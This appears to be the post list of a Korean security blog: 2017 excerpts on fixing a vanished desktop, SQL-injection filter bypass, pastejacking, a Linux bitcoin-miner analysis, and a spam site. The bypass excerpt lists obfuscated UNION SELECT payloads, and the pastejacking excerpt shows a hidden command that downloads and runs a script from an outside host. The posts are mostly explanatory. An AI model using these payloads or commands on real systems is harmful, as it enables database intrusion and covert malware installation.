전체 글(151)
-
바탕화면이 사라지거나 아이콘이 안보일때
이상하게 잘 안보일 경우에 taskkill 로 explorer.exe를 죽이고 다시 시작하면 문제없이 볼 수 있다. 아래는 bat파일 명령어@echo off taskkill /f /im explorer.exe attrib %userprofile%\appdata\local\iconcache.db -s -r -h del /q %userprofile%\appdata\local\iconcache.db start explorer.exe exit
2017.09.25 -
bypass
/*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt+ +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%..
2017.09.25 -
[해킹] 모르면 당한다 2탄. 복사, 붙여넣기만 해도 악성코드에 감염되는 Pastejacking!
/var/www/html/harmless 코드입니다. 사실 많이 해롭습니다. git clone /dev/null; clear; wget http://192.168.10.21/badcode.py -O /tmp/badcode.py &>/dev/null && chmod +x /tmp/badcode.py && /tmp/badcode.py & disown && clear git clone https://github.com/LionSec/katoolin.git /var/www/badcode.py 는 개인에 맞게 커스터마이징하여 만든 코드이기 때문에 새로 직접 작성하셔야 합니다.
2017.09.18 -
리눅스 비트코인 마이너 분석
모의 침투 연구회에 글이 올라와서 빠르게 대충(?) 분석해보았다. 리눅스 악성코드 샘플은 처음보는 본인... 세세한 수식은 확인해보고 추가로 포스팅을 완성하겠음. 분석 시작 'bash라는 이름의 프로세스' 주목하자...! 유저 그룹권한이 모두 mysql임을 주목하자 샘플 파일은 9개의 파일로 이루어져있다. 처음에는 이 9개의 파일이 한곳에서 모든 작업을 하는지 아니면 악성코드의 일부분인지 몰라 분석이 가능할까 싶었다. 일단 elf파일들을 제외한 나머지 text 쉘 파일들만 다 열어보았다. autorun 파일이다. 현재 경로를 dir에 복사하고 crontab으로 반복작업을 수행할 파일을 cron 파일로 redirect crontab 유저 중 upd를 grep하는건 아마 실행 명령어가 잘 들어간지 확인해보려..
2017.09.15 -
뻘짓 겸 충고...
스팸메일을 가끔 뒤적거리는데 비X그라같은 제품들을 판매하는 페이지가 보였다. 홈페이지 맨 아래쪽을 보니 음..... 여기에 한국인터넷진흥원과 VeriSign은 왜있지? SSL도 안쓰면서... ICANN은 또 왜있는거야..... 옆에 실시간 1:1 상담 서비스가 있다. 그래서 충고를 해줬다.... .... 나도 정상은 아닌가보다.
2017.09.05 -
Resource Hacker
파일 내부의 resource 들을 간편하게 수정할 수 있도록 해주는 프로그램입니다. 다운로드 받기
2017.09.02